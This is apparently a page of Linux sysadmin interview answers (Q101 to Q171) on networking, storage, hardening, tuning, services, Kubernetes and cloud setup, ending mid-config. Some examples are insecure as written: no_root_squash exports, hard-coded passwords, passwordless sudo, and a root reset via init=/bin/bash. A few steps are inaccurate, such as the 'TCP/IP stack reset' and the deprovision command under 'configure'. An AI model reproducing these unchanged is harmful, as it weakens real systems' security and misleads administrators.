Skip to content

Linux_Practical_Interview_101 250

Linux Practical Interview Questions (101-250)

Section titled “Linux Practical Interview Questions (101-250)”

Answer:

Terminal window
# Find and delete
find /tmp -type f -name "*.tmp" -exec rm {} \;
# Equivalent using xargs (NUL-delimited so filenames with spaces/newlines are safe)
find /tmp -type f -name "*.tmp" -print0 | xargs -0 rm
# Parallel processing
ls *.jpg | xargs -n 1 -P 4 convert -resize 800x600
# With custom delimiter
echo "a:b:c" | xargs -d ':' -n1
# Prompt before execution
ls | xargs -p rm

Answer:

Terminal window
# Create named pipe
mkfifo /tmp/myfifo
# In one terminal (read)
cat < /tmp/myfifo
# In another terminal (write)
echo "Hello" > /tmp/myfifo
# Process substitution
diff <(sort file1) <(sort file2)
# While reading
while read line; do echo "$line"; done < /tmp/myfifo

Q103: How do you use process substitution?

Section titled “Q103: How do you use process substitution?”

Answer:

Terminal window
# Compare two command outputs
diff <(command1) <(command2)
# Read from multiple files
while read line; do echo "$line"; done < <(cat file1 file2)
# Feed output to command expecting file
grep pattern <(echo "line with pattern")
# Multiple inputs
comm <(sort file1) <(sort file2)

Answer:

Terminal window
# Basic GET
curl https://api.example.com
# POST with JSON
curl -X POST -H "Content-Type: application/json" \
-d '{"key":"value"}' https://api.example.com
# Download with progress
curl -O -L https://example.com/file.zip
# With authentication
curl -u user:password https://api.example.com
# Follow redirects
curl -L https://example.com
# With cookie
curl -b cookies.txt -c cookies.txt https://example.com

Answer:

Terminal window
# Download file
wget https://example.com/file.zip
# Download recursively
wget -r https://example.com/
# Continue download
wget -c https://example.com/largefile.zip
# Mirror site
wget -m -k -p https://example.com
# Download with credentials
wget --user=user --password=pass https://example.com
# Limit bandwidth
wget --limit-rate=100k https://example.com/file.zip

Q106: How do you configure network bonding in Linux?

Section titled “Q106: How do you configure network bonding in Linux?”

Answer:

Terminal window
# Create bond interface
cat > /etc/sysconfig/network-scripts/ifcfg-bond0 <<EOF
DEVICE=bond0
ONBOOT=yes
BOOTPROTO=none
IPADDR=192.168.1.10
NETMASK=255.255.255.0
GATEWAY=192.168.1.1
BONDING_OPTS="mode=1 miimon=100 fail_over_mac=2"
EOF
# Configure slave interfaces
cat > /etc/sysconfig/network-scripts/ifcfg-eth0 <<EOF
DEVICE=eth0
MASTER=bond0
SLAVE=yes
ONBOOT=yes
EOF
# Reload network
systemctl restart network

Answer:

Terminal window
# Install VLAN package
apt install vlan
# Create VLAN interface
vconfig add eth0 100
# Configure
cat > /etc/sysconfig/network-scripts/ifcfg-eth0.100 <<EOF
DEVICE=eth0.100
VLAN=yes
ONBOOT=yes
IPADDR=192.168.100.10
NETMASK=255.255.255.0
EOF
# Or use ip command
ip link add link eth0 name eth0.100 type vlan id 100
ip addr add 192.168.100.10/24 dev eth0.100

Q108: How do you configure network bridging?

Section titled “Q108: How do you configure network bridging?”

Answer:

Terminal window
# Create bridge
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
# Configure IP
ip addr add 192.168.1.10/24 dev br0
ip link set br0 up
# Make persistent (CentOS/RHEL)
cat > /etc/sysconfig/network-scripts/ifcfg-br0 <<EOF
DEVICE=br0
TYPE=Bridge
IPADDR=192.168.1.10
NETMASK=255.255.255.0
ONBOOT=yes
EOF

Answer:

Terminal window
# Add temporary route
ip route add 192.168.100.0/24 via 192.168.1.1 dev eth0
ip route add default via 192.168.1.1
# Persistent routes (CentOS)
cat > /etc/sysconfig/network-scripts/route-eth0 <<EOF
192.168.100.0/24 via 192.168.1.1
EOF
# Persistent routes (Debian)
cat >> /etc/network/interfaces <<EOF
up ip route add 192.168.100.0/24 via 192.168.1.1
EOF
# View routes
ip route show
route -n

Q110: How do you configure 802.1Q VLAN tagging?

Section titled “Q110: How do you configure 802.1Q VLAN tagging?”

Answer:

Terminal window
# Load kernel module
modprobe 8021q
# Make persistent
echo "8021q" >> /etc/modules
# Create VLAN
vconfig add eth0 100
# Configure IP
ip addr add 192.168.100.10/24 dev eth0.100
ip link set eth0.100 up
# Verify
ip -d link show eth0.100

Answer:

Terminal window
# Install initiator
apt install open-iscsi
# Discover targets
iscsiadm -m discovery -t st -p 192.168.1.100
# Login to target
iscsiadm -m node -T iqn.2023-01.com.example:storage.lun0 -l
# Make persistent
iscsiadm -m node -T iqn.2023-01.com.example:storage.lun0 -p 192.168.1.100 --op update -n node.startup -v automatic
# Check status
iscsiadm -m session -P 3
# Remove
iscsiadm -m node -T iqn.2023-01.com.example:storage.lun0 -u

Answer:

Terminal window
# Server side
# Install
apt install nfs-kernel-server
# Create export
mkdir -p /exports/shared
echo "/exports/shared 192.168.1.0/24(rw,sync,no_root_squash,no_all_squash)" >> /etc/exports
# Export
exportfs -a
systemctl restart nfs-kernel-server
# Client side
apt install nfs-common
# Mount
mount -t nfs 192.168.1.10:/exports/shared /mnt/nfs
# Persistent mount
echo "192.168.1.10:/exports/shared /mnt/nfs nfs defaults 0 0" >> /etc/fstab

Answer:

Terminal window
# Install
apt install cifs-utils samba
# Server config /etc/samba/smb.conf
[shared]
path = /srv/samba/shared
browseable = yes
writable = yes
valid users = @smbgroup
# Create user
smbpasswd -a username
# Client mount
mount -t cifs //server/share /mnt -o user=username,password=pass
# Persistent mount
# /etc/fstab
//server/share /mnt cifs credentials=/root/smb.creds 0 0

Answer:

Terminal window
# Create squashfs
mksquashfs source_dir output.squashfs -comp xz
# Mount squashfs
mount -t squashfs -o loop image.squashfs /mnt/squash
# List contents
unsquashfs -l image.squashfs
# Extract specific file (give the path after the image; -e expects a file containing a list)
unsquashfs image.squashfs file.txt
# With compression options
mksquashfs source output.squashfs -comp xz -Xbcj x86

Q115: How do you use Stratis for storage management?

Section titled “Q115: How do you use Stratis for storage management?”

Answer:

Terminal window
# Install
apt install stratisd stratis-cli
# Start service
systemctl start stratisd
# Create pool
stratis pool create mypool /dev/sdb /dev/sdc
# Create filesystem
stratis fs create mypool myfs
# Mount
mount /stratis/mypool/myfs /mnt
# List
stratis pool list
stratis fs list

Answer:

/etc/sysctl.conf
# Network hardening
net.ipv4.tcp_syncookies = 1
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.default.send_redirects = 0
# Apply
sysctl -p

Answer:

Terminal window
# Install
apt install quota
# Enable quota in fstab
# Add usrquota,grpquota to /etc/fstab
# /dev/sda1 / ext4 defaults,usrquota,grpquota 0 0
# Remount
mount -o remount /
# Initialize quota
quotacheck -augm
# Set user quota
edquota -u username
# Enable quota
quotaon -uv /
# Check quota
quota -u username
repquota -a

Q118: How do you set up AIDE (Advanced Intrusion Detection Environment)?

Section titled “Q118: How do you set up AIDE (Advanced Intrusion Detection Environment)?”

Answer:

Terminal window
# Install
apt install aide
# Initialize database
aideinit
# Configure
cat /etc/aide/aide.conf
!/var/log/.*
!/var/cache/.*
# Update database
aide --update
# Check integrity
aide --check
# Daily cron
0 5 * * * /usr/bin/aide --check

Answer:

Terminal window
# Install
apt install apparmor apparmor-profiles
# Check status
aa-status
# Enable modes
aa-complain /usr/bin/nginx
aa-enforce /usr/bin/nginx
# Create profile
cat /etc/apparmor.d/usr.bin.myapp
#include <tunables/global>
/usr/bin/myapp {
# Allow read
/etc/myapp/** r,
# Allow write
/var/log/myapp/** rw,
}
# Reload
apparmor_parser -r /etc/apparmor.d/usr.bin.myapp

Q120: How do you implement file integrity monitoring?

Section titled “Q120: How do you implement file integrity monitoring?”

Answer:

Terminal window
# Using AIDE (see above)
# Using tripwire
apt install tripwire
# Initialize
twadmin --create-polfile /etc/tripwire/tw.pol
tripwire --init
# Check
tripwire --check
# Update
tripwire --update --accept-all

Q121: How do you tune network performance?

Section titled “Q121: How do you tune network performance?”

Answer:

/etc/sysctl.conf
# Increase TCP buffer sizes
net.core.rmem_max = 16777216
net.core.wmem_max = 16777216
net.ipv4.tcp_rmem = 4096 87380 16777216
net.ipv4.tcp_wmem = 4096 65536 16777216
# Increase connection tracking
net.netfilter.nf_conntrack_max = 1048576
# Enable TCP BBR
net.core.default_qdisc = fq
net.ipv4.tcp_congestion_control = bbr
# Apply
sysctl -p

Answer:

Terminal window
# Scheduler
# Check current
cat /sys/block/sda/queue/scheduler
# Set deadline
echo deadline > /sys/block/sda/queue/scheduler
# I/O scheduler options
echo 1024 > /sys/block/sda/queue/nr_requests
echo 256 > /sys/block/sda/queue/read_ahead_kb
# Make persistent (CentOS)
# /etc/udev/rules.d/60-scheduler.rules
ACTION=="add|change", KERNEL=="sda", ATTR{queue/scheduler}="deadline"

Answer:

/etc/sysctl.conf
# Swappiness
vm.swappiness = 10
vm.vfs_cache_pressure = 50
vm.dirty_ratio = 60
vm.dirty_background_ratio = 5
# Huge pages
vm.nr_hugepages = 128
# Apply
sysctl -p
# Check memory
cat /proc/meminfo

Answer:

Terminal window
# CPU governor
# Check available governors
cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors
# Set performance (loop per CPU: redirecting to a multi-file glob is an ambiguous redirect in bash)
for gov in /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor; do echo performance > "$gov"; done
# Make persistent
# /etc/default/cpufrequtils
GOVERNOR="performance"
# Disable transparent huge pages
echo never > /sys/kernel/mm/transparent_hugepage/enabled

Answer:

/etc/sysctl.conf
# Connection tracking
net.netfilter.nf_conntrack_max = 1048576
net.netfilter.nf_conntrack_tcp_timeout_established = 7200
# TCP timeouts
net.ipv4.tcp_fin_timeout = 15
net.ipv4.tcp_keepalive_time = 300
net.ipv4.tcp_keepalive_probes = 5
net.ipv4.tcp_keepalive_intvl = 15
# TCP buffer
net.core.rmem_max = 134217728
net.core.wmem_max = 134217728
# Apply
sysctl -p

Q126: How do you configure Postfix mail server?

Section titled “Q126: How do you configure Postfix mail server?”

Answer:

/etc/postfix/main.cf
# Install
apt install postfix mailutils
myhostname = mail.example.com
mydomain = example.com
myorigin = $mydomain
mydestination = $myhostname, localhost, localhost.localdomain
mynetworks = 192.168.1.0/24 127.0.0.0/8
relayhost = [smtp.provider.com]:587
smtp_sasl_auth_enable = yes
smtp_sasl_password_maps = hash:/etc/postfix/sasl_passwd
smtp_tls_security_level = encrypt
# Create password map
echo "[smtp.provider.com]:587 username:password" > /etc/postfix/sasl_passwd
postmap /etc/postfix/sasl_passwd
systemctl restart postfix

Answer:

/etc/dovecot/dovecot.conf
# Install
apt install dovecot-core dovecot-imapd dovecot-pop3d
protocols = imap pop3
listen = *
# /etc/dovecot/10-auth.conf
disable_plaintext_auth = yes
auth_mechanisms = plain login
# /etc/dovecot/10-mail.conf
mail_location = maildir:~/Maildir
# Configure userdb
# /etc/dovecot/10-user.conf
userdb {
driver = passwd
}
systemctl restart dovecot

Answer:

/etc/squid/squid.conf
# Install
apt install squid
http_port 3128
acl localnet src 192.168.1.0/24
http_access allow localnet
http_access deny all
# Cache configuration
cache_dir ufs /var/spool/squid 10000 16 256
maximum_object_size 4096 MB
# Authentication
auth_param basic program /usr/lib/squid/ncsa_auth /etc/squid/passwd
acl authenticated proxy_auth REQUIRED
http_access allow authenticated
# Reload
systemctl reload squid

Answer:

/etc/haproxy/haproxy.cfg
# Install
apt install haproxy
global
log /dev/log local0
maxconn 4000
user haproxy
group haproxy
defaults
log global
mode http
option httplog
option dontlognull
option http-server-close
option forwardfor except 127.0.0.0/8
option redispatch
retries 3
timeout connect 5000
timeout client 50000
timeout server 50000
frontend http-in
bind *:80
default_backend servers
backend servers
balance roundrobin
server web1 192.168.1.10:80 check
server web2 192.168.1.11:80 check

Answer:

/etc/vsftpd.conf
# Install
apt install vsftpd
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
dirmessage_enable=YES
use_localtime=YES
xferlog_enable=YES
connect_from_port_20=YES
secure_chroot_dir=/var/run/vsftpd/empty
# Enable SSL
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=YES
# Create user
useradd -m -s /usr/sbin/nologin ftpuser
passwd ftpuser
systemctl restart vsftpd

Answer:

Terminal window
# Install
apt install sysstat
# Enable data collection
systemctl enable sysstat
systemctl start sysstat
# CPU stats
sar -u 1 5
# All CPU
sar -P ALL 1 3
# Memory
sar -r 1 3
# Swap
sar -S 1 3
# I/O
sar -b 1 3
# Network
sar -n DEV 1 3
# Generate report
sar -A > /tmp/sar_report.txt

Answer:

Terminal window
# Install
apt install sysstat
# Basic
iostat
# Interval
iostat 2 5
# Per device
iostat -x
# Detailed
iostat -x -t
# Specific device
iostat -d sda
# Report CPU and device utilization
iostat -c -d sda

Answer:

Terminal window
# Install
apt install sysstat
# All CPUs
mpstat
# Interval
mpstat 2 5
# Per processor
mpstat -P ALL 2 3
# Specific CPU
mpstat -P 0 1 5
# Fields
mpstat -A

Answer:

Terminal window
# Install
apt install sysstat
# CPU per process
pidstat -p PID 1
# Memory
pidstat -r PID 1
# I/O
pidstat -d PID 1
# All processes
pidstat 1
# User-specific
pidstat -u -p ALL 1
# Interval with lines
pidstat -hl 1

Answer:

Terminal window
# Install
apt install atop
# Interactive
atop
# Interval
atop 1
# Specific process
atop -p PID
# Network
atop -n
# Disk
atop -d
# Write to file
atop -w /tmp/atop.log 30 120
# Read
atop -r /tmp/atop.log
# Daily summaries
atopsar -c
atopsar -m

Q136: How do you configure Kubernetes node?

Section titled “Q136: How do you configure Kubernetes node?”

Answer:

Terminal window
# Install kubeadm
apt-get update && apt-get install -y apt-transport-https curl
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg | apt-key add -
echo "deb https://apt.kubernetes.io/ kubernetes-xenial main" > /etc/apt/sources.list.d/kubernetes.list
apt-get update && apt-get install -y kubelet kubeadm kubectl
# Initialize master
kubeadm init --pod-network-cidr=10.244.0.0/16
# Join node
kubeadm join 192.168.1.10:6443 --token token --discovery-token-ca-cert-hash sha256:hash
# Install pod network
kubectl apply -f https://raw.githubusercontent.com/flannel/flannel/master/Documentation/kube-flannel.yml

Q137: How do you create Kubernetes deployments?

Section titled “Q137: How do you create Kubernetes deployments?”

Answer:

deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: myapp
spec:
replicas: 3
selector:
matchLabels:
app: myapp
template:
metadata:
labels:
app: myapp
spec:
containers:
- name: myapp
image: nginx:latest
ports:
- containerPort: 80
resources:
limits:
memory: "128Mi"
cpu: "500m"
requests:
memory: "64Mi"
cpu: "250m"
# Apply
kubectl apply -f deployment.yaml

Q138: How do you configure Kubernetes services?

Section titled “Q138: How do you configure Kubernetes services?”

Answer:

service.yaml
apiVersion: v1
kind: Service
metadata:
name: myapp-svc
spec:
type: ClusterIP
selector:
app: myapp
ports:
- port: 80
targetPort: 80
# NodePort
spec:
type: NodePort
selector:
app: myapp
ports:
- port: 80
targetPort: 80
nodePort: 30080
# LoadBalancer
spec:
type: LoadBalancer
selector:
app: myapp
ports:
- port: 80
targetPort: 80
# Apply
kubectl apply -f service.yaml

Q139: How do you manage Kubernetes configmaps and secrets?

Section titled “Q139: How do you manage Kubernetes configmaps and secrets?”

Answer:

Terminal window
# Create configmap
kubectl create configmap app-config \
--from-literal=ENV=production \
--from-file=app.properties=app.properties
# Create secret
kubectl create secret generic db-credentials \
--from-literal=username=admin \
--from-literal=password=secret
# From file
kubectl create secret generic tls-cert \
--from-file=tls.crt=tls.crt \
--from-file=tls.key=tls.key
# Use in pod
env:
- name: ENV
valueFrom:
configMapKeyRef:
name: app-config
key: ENV
- name: PASSWORD
valueFrom:
secretKeyRef:
name: db-credentials
key: password

Q140: How do you manage Kubernetes ingress?

Section titled “Q140: How do you manage Kubernetes ingress?”

Answer:

ingress.yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: myapp-ingress
annotations:
nginx.ingress.kubernetes.io/rewrite-target: /
spec:
rules:
- host: myapp.example.com
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: myapp-svc
port:
number: 80
# Apply
kubectl apply -f ingress.yaml

Answer:

Terminal window
# Check IPv6 status
ip -6 addr show
ping6 ipv6.google.com
# Static IPv6 address
ip -6 addr add 2001:db8::10/64 dev eth0
# Route IPv6
ip -6 route add 2001:db8:1::/48 via 2001:db8::1
# Disable IPv6
# sysctl.conf
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
# Apply
sysctl -p

Q142: How do you configure bonding with LACP?

Section titled “Q142: How do you configure bonding with LACP?”

Answer:

/etc/sysconfig/network-scripts/ifcfg-bond0
DEVICE=bond0
ONBOOT=yes
BOOTPROTO=none
BONDING_OPTS="mode=4 miimon=100 lacp_rate=1"
# /etc/sysconfig/network-scripts/ifcfg-eth0
DEVICE=eth0
ONBOOT=yes
MASTER=bond0
SLAVE=yes
ETHTOOL_OPTS="speed 1000 duplex full"
# Verify
cat /proc/net/bonding/bond0

Q143: How do you configure network monitoring?

Section titled “Q143: How do you configure network monitoring?”

Answer:

Terminal window
# Using nethogs
apt install nethogs
nethogs eth0
# Using iftop
apt install iftop
iftop
# Using bmon
apt install bmon
bmon
# Using iptraf-ng
apt install iptraf-ng
iptraf-ng
# Using vnstat
apt install vnstat
vnstat -l -i eth0

Q144: How do you configure packet filtering?

Section titled “Q144: How do you configure packet filtering?”

Answer:

Terminal window
# Basic iptables rules
# Allow established connections
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# Allow SSH
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
# Allow HTTP/HTTPS
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j ACCEPT
# Allow localhost
iptables -A INPUT -i lo -j ACCEPT
# Drop everything else
iptables -A INPUT -j DROP
# Save rules
iptables-save > /etc/iptables/rules.v4

Answer:

Terminal window
# Install
apt install nftables
# Create ruleset
cat > /etc/nftables.conf <<EOF
#!/usr/sbin/nft -f
flush ruleset
table inet filter {
chain input {
type filter hook input priority 0; policy drop;
ct state established,related accept
iif lo accept
tcp dport ssh accept
tcp dport http accept
tcp dport https accept
}
chain forward {
type filter hook forward priority 0; policy drop;
}
chain output {
type filter hook output priority 0; policy accept;
}
}
EOF
# Reload
nft -f /etc/nftables.conf
systemctl enable nftables

Answer:

Terminal window
# Create swap file (plain, not encrypted — use cryptsetup/crypttab for encrypted swap)
dd if=/dev/zero of=/swapfile bs=1M count=2048
chmod 600 /swapfile
mkswap /swapfile
# Add to /etc/fstab
/swapfile none swap sw 0 0
# Enable
swapon /swapfile
# Verify
swapon -s
free -h

Q147: How do you configure device mapper multipath?

Section titled “Q147: How do you configure device mapper multipath?”

Answer:

Terminal window
# Install
apt install multipath-tools
# Configure /etc/multipath.conf
defaults {
user_friendly_names yes
find_multipaths yes
}
multipaths {
multipath {
wwid "3600605b00e0c960018e0c95c00000000"
alias mpath0
}
}
# Start service
systemctl start multipathd
systemctl enable multipathd
# Commands
multipath -ll
multipath -f mpath0

Answer:

Terminal window
# Create btrfs
mkfs.btrfs -L mydata /dev/sdb
# Mount
mount /dev/sdb /mnt/btrfs
# Subvolumes
btrfs subvolume create /mnt/btrfs/data
btrfs subvolume list /mnt/btrfs
# Snapshots
btrfs subvolume snapshot /mnt/btrfs/data /mnt/btrfs/snap
# Balance
btrfs balance start /mnt/btrfs
# Compression
mount -o compress=zstd /dev/sdb /mnt/btrfs
# RAID
mkfs.btrfs -d raid1 -m raid1 /dev/sdb /dev/sdc

Answer:

Terminal window
# Install
apt install bcache-tools
# Create backing device (-B = backing)
make-bcache -B /dev/sdc
# Create cache device (-C = cache)
make-bcache -C /dev/sda
# Register devices with the kernel
echo /dev/sdc > /sys/fs/bcache/register
echo /dev/sda > /sys/fs/bcache/register
# Attach cache set to backing device (UUID from: bcache-super-show /dev/sda)
echo <cache-set-uuid> > /sys/block/bcache0/bcache/attach
# Make filesystem
mkfs.ext4 /dev/bcache0
mount /dev/bcache0 /mnt

Q150: How do you use mdadm for software RAID?

Section titled “Q150: How do you use mdadm for software RAID?”

Answer:

Terminal window
# Create RAID 5
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/sdb /dev/sdc /dev/sdd
# Create RAID 10
mdadm --create /dev/md0 --level=10 --raid-devices=4 /dev/sdb /dev/sdc /dev/sdd /dev/sde
# Check status
mdadm --detail /dev/md0
cat /proc/mdstat
# Stop array
mdadm --stop /dev/md0
# Remove failed disk
mdadm /dev/md0 --remove /dev/sdb
# Add new disk
mdadm --add /dev/md0 /dev/sde
# Monitor
mdadm --monitor --daemonise --mail=admin@example.com /dev/md0

Q151: How do you recover from forgotten root password?

Section titled “Q151: How do you recover from forgotten root password?”

Answer:

# Method 1: Single user mode
1. Reboot system
2. Press 'e' at GRUB menu
3. Add 'single' or 'init=/bin/bash' to linux line
4. Press Ctrl+X to boot
5. mount -o remount,rw /
6. passwd root
7. exec /sbin/init
# Method 2: Using rescue disk
1. Boot from rescue media
2. Mount filesystem
3. chroot /mnt/sysimage
4. passwd root
5. exit
6. reboot

Q152: How do you recover from boot failure?

Section titled “Q152: How do you recover from boot failure?”

Answer:

Terminal window
# Check boot logs
journalctl -b -1
dmesg | grep -i error
# Rebuild initramfs
update-initramfs -u
# Reinstall GRUB
grub-install /dev/sda
grub-mkconfig -o /boot/grub/grub.cfg
# Check fstab
blkid
mount -a
# Emergency boot
# Add to GRUB: init=/bin/bash

Q153: How do you recover from disk failure?

Section titled “Q153: How do you recover from disk failure?”

Answer:

Terminal window
# Check disk health
smartctl -a /dev/sda
# Check filesystem
fsck -n /dev/sda1
# Remount read-only
mount -o ro,remount /dev/sda1
# Try to fix
fsck -y /dev/sda1
# Replace disk
# 1. Partition new disk (sfdisk -d /dev/sda | sfdisk /dev/sdb)
# 2. Copy boot sector (dd if=/dev/sda of=/dev/sdb bs=512 count=1)
# 3. Rebuild RAID (mdadm --add /dev/md0 /dev/sdb)
# 4. Rebuild GRUB

Q154: How do you recover from network issues?

Section titled “Q154: How do you recover from network issues?”

Answer:

Terminal window
# Reset network
ip link set eth0 down
ip link set eth0 up
dhclient -r eth0
dhclient eth0
# Restart network service
systemctl restart NetworkManager
systemctl restart networking
# Check logs
journalctl -xe
# Reset TCP/IP stack
sysctl -w net.ipv4.tcp_rmem="4096 87380 6291456"
sysctl -w net.ipv4.tcp_wmem="4096 65536 6291456"
sysctl -w net.core.rmem_max="12582912"
sysctl -w net.core.wmem_max="12582912"

Q155: How do you recover from memory issues?

Section titled “Q155: How do you recover from memory issues?”

Answer:

Terminal window
# Check OOM killer
dmesg | grep -i "out of memory"
journalctl -k | grep -i "killed process"
# Check process memory
ps aux --sort=-%mem | head
pmap -X PID
# Clear cache
sync
echo 3 > /proc/sys/vm/drop_caches
# Kill process manually
kill -15 PID
kill -9 PID
# Adjust OOM settings
echo -15 > /proc/PID/oom_score_adj

Answer:

Terminal window
# Install dependencies
apt install build-essential libncurses-dev bison flex libssl-dev libelf-dev
# Download kernel
wget https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.15.tar.xz
tar -xf linux-5.15.tar.xz
cd linux-5.15
# Configure
make menuconfig
# Build
make -j$(nproc)
make modules_install
make install
# Update GRUB
update-grub
reboot

Answer:

hello.c
#include <linux/module.h>
#include <linux/kernel.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Author");
MODULE_DESCRIPTION("Hello World Module");
int init_module(void) {
printk(KERN_INFO "Hello World!\n");
return 0;
}
void cleanup_module(void) {
printk(KERN_INFO "Goodbye World!\n");
}
# Makefile
obj-m += hello.o
KDIR := /lib/modules/$(shell uname -r)/build
all:
make -C $(KDIR) M=$(PWD) modules
clean:
make -C $(KDIR) M=$(PWD) clean
# Build
make
# Load
insmod hello.ko
# Unload
rmmod hello
# Check
lsmod | grep hello
dmesg | tail

Q158: How do you tune kernel parameters at runtime?

Section titled “Q158: How do you tune kernel parameters at runtime?”

Answer:

Terminal window
# View all parameters
sysctl -a
# View specific
sysctl net.ipv4.tcp_rmem
# Set temporarily
sysctl -w net.ipv4.tcp_rmem="4096 87380 6291456"
# Set persistently
echo "net.ipv4.tcp_rmem = 4096 87380 6291456" >> /etc/sysctl.conf
sysctl -p
# View parameter documentation
ls /proc/sys/
# or
man sysctl.conf

Q159: How do you add system calls to kernel?

Section titled “Q159: How do you add system calls to kernel?”

Answer:

// mysyscall.c (in kernel source)
asmlinkage long sys_mysyscall(int arg) {
printk(KERN_INFO "My syscall called with %d\n", arg);
return 0;
}
// Add to syscall table (arch/x86/entry/syscalls/syscall_64.tbl)
555 64 mysyscall sys_mysyscall
// In kernel headers
#define __NR_mysyscall 555
// User space
#include <sys/syscall.h>
syscall(555, arg);

Answer:

Terminal window
# Kernel debugging
# Enable debug
CONFIG_DEBUG_INFO=y
CONFIG_DEBUG_KERNEL=y
CONFIG_KALLSYMS=y
# Use kgdb
CONFIG_KGDB=y
# Add to boot: kgdboc=ttyS0,115200
# Use crash dump
# Install crash
apt install crash
# Capture
kexec -p /boot/vmlinuz --initrd=/boot/initrd.img --append="-- crash"
# Kernel logs
dmesg
journalctl -k
/var/log/dmesg

Answer:

Terminal window
# Using jq
apt install jq
# Parse JSON
echo '{"name":"John","age":30}' | jq '.name'
echo '{"users":["Alice","Bob"]}' | jq '.users[0]'
# Conditional
echo '{"status":"ok"}' | jq 'if .status == "ok" then "success" else "failed" end'
# Modify
echo '{"name":"John"}' | jq '.age = 30'
# From file
jq '.users[]' data.json
# With variables
NAME=$(echo "$JSON" | jq -r '.name')

Answer:

Terminal window
# Basic parsing
while IFS=',' read -r col1 col2 col3; do
echo "$col1 $col2 $col3"
done < file.csv
# Skip header
tail -n +2 file.csv | while IFS=',' read -r col1 col2 col3; do
echo "$col1 $col2 $col3"
done
# Using awk
awk -F',' '{print $1,$2}' file.csv
# With headers
awk -F',' 'NR==1 {for(i=1;i<=NF;i++) h[$i]=i} NR>1 {print $h["name"],$h["age"]}' file.csv

Q163: How do you use expect for automation?

Section titled “Q163: How do you use expect for automation?”

Answer:

Terminal window
# Install
apt install expect
# expect script
#!/usr/bin/expect -f
set timeout 30
spawn ssh user@host
expect "password:"
send "mypassword\r"
expect "~]$"
send "ls -la\r"
expect eof
# Run
chmod +x script.exp
./script.exp

Q164: How do you use Python for system administration?

Section titled “Q164: How do you use Python for system administration?”

Answer:

#!/usr/bin/env python3
import subprocess
import os
import sys
# Run command
result = subprocess.run(['ls', '-la'], capture_output=True, text=True)
print(result.stdout)
# Check service status
def check_service(name):
result = subprocess.run(['systemctl', 'is-active', name],
capture_output=True, text=True)
return result.stdout.strip() == 'active'
# File operations
with open('/etc/hosts', 'r') as f:
for line in f:
print(line.strip())
# Network check
import socket
socket.gethostbyname('example.com')

Answer:

Terminal window
# GNU Parallel
apt install parallel
# Parallel execution
cat servers.txt | parallel -j 10 "ssh {} 'uptime'"
# With SSH
parallel-ssh -h hosts.txt -i "uptime"
# Process files in parallel
ls *.jpg | parallel -j 4 convert -resize 800x600 {} {}_small.jpg
# With xargs
find . -name "*.log" | xargs -P 4 -I {} gzip {}
# GNU parallel with variables
seq 1 100 | parallel -j 10 'echo "Number {}"'

Q166: How do you configure AWS CLI on Linux?

Section titled “Q166: How do you configure AWS CLI on Linux?”

Answer:

Terminal window
# Install AWS CLI
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
./aws/install
# Configure
aws configure
AWS Access Key ID: ***
AWS Secret Access Key: ***
Default region name: us-east-1
Default output format: json
# Profile
aws configure --profile myprofile
aws s3 ls --profile myprofile

Q167: How do you use AWS SSM Session Manager?

Section titled “Q167: How do you use AWS SSM Session Manager?”

Answer:

Terminal window
# Install SSM agent
apt install amazon-ssm-agent
# Start service
systemctl start amazon-ssm-agent
systemctl enable amazon-ssm-agent
# Configure
# Add IAM role with AmazonSSMManagedInstanceCore
# Connect
aws ssm start-session --target i-1234567890abcdef0
# Transfer files
aws ssm start-session --target i-1234567890abcdef0 \
--document-name AWS-StartPortForwardingSession \
--parameters '{"portNumber":["3389"],"localPortNumber":["33890"]}'

Answer:

cloud-config.yaml
#cloud-config
package_update: true
packages:
- nginx
- curl
write_files:
- path: /var/www/html/index.html
content: |
<html><h1>Hello World</h1></html>
runcmd:
- systemctl enable nginx
- systemctl start nginx
users:
- name: admin
ssh-authorized-keys:
- ssh-rsa AAAAB... user@host
sudo: ALL=(ALL) NOPASSWD:ALL

Q169: How do you use Terraform with Linux?

Section titled “Q169: How do you use Terraform with Linux?”

Answer:

main.tf
terraform {
required_providers {
aws = {
source = "hashicorp/aws"
version = "~> 4.0"
}
}
}
provider "aws" {
region = "us-east-1"
}
resource "aws_instance" "web" {
ami = "ami-0c55b159cbfafe1f0"
instance_type = "t3.micro"
tags = {
Name = "web-server"
}
user_data = <<-EOF
#!/bin/bash
yum update -y
yum install -y httpd
systemctl start httpd
systemctl enable httpd
EOF
}
# Commands
terraform init
terraform plan
terraform apply
terraform destroy

Q170: How do you configure Azure cloud agent on Linux?

Section titled “Q170: How do you configure Azure cloud agent on Linux?”

Answer:

Terminal window
# Install Azure agent
wget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb
dpkg -i packages-microsoft-prod.deb
apt update
apt install -y waagent
# Configure
# Edit /etc/waagent.conf
# ResourceDisk.Format=y
# ResourceDisk.Filesystem=ext4
# Enable SSH
# Provision
waagent -force -deprovision

Answer:

/etc/keepalived/keepalived.conf
# Install
apt install keepalived
vrrp_instance VI_1 {
state MASTER
interface eth0
virtual_router_id 51
priority 100
advert_int 1
authentication {
auth_type PASS
auth_pass mypassword
}
virtual_ipaddress {
